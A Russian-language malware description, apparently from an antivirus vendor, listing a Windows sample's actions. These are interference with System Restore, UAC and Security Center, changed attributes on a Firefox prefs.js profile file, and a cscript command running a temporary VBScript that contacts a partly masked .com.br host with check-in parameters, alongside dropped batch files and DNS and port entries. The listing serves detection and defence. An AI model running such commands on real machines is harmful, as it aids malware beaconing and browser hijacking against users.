Техническая информация
- Компонент восстановления системы (SR)
- Средство контроля пользовательских учетных записей (UAC)
- Центр обеспечения безопасности (Security Center)
- '<SYSTEM32>\attrib.exe' +r "%APPDATA%\Mozilla\Firefox\Profiles\cwdgt0y8.default\prefs.js"
- '<SYSTEM32>\cscript.exe' //nologo "%TEMP%\send4254.vbs" "http://uo#.###hecaauol.com.br/black/?" "tipo=alivei&cliente=teste"
- '<SYSTEM32>\cmd.exe' /c %TEMP%\nfjzdwJQDQXdPOXfwfUWQlcvmunwQVMKGeLmsWAprLSzPOJZL.bat
- '<SYSTEM32>\attrib.exe' -r -a -s -h "%APPDATA%\Mozilla\Firefox\Profiles\cwdgt0y8.default\prefs.js"
- %TEMP%\send4254.vbs
- %TEMP%\CRNJEUFU.txt
- %TEMP%\nfjzdwJQDQXdPOXfwfUWQlcvmunwQVMKGeLmsWAprLSzPOJZL.bat
- %TEMP%\nfjzdwJQDQXdPOXfwfUWQlcvmunwQVMKGeLmsWAprLSzPOJZL.bat
- 'uo#.###hecaauol.com.br':80
- 'localhost':1039
- uo#.###hecaauol.com.br/black/?
- DNS ASK uo#.###hecaauol.com.br